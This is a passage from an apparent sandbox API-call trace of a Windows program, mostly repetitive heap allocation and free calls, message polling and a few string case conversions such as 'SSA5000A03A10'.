hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0197.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0197.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0197.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0197.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0197.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0197.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0197.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0197.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0197.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0197.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0197.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0197.068] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0197.068] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0197.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.069] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0197.069] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0197.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0197.069] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0197.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0197.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0197.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0197.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0197.071] HeapFree (in: 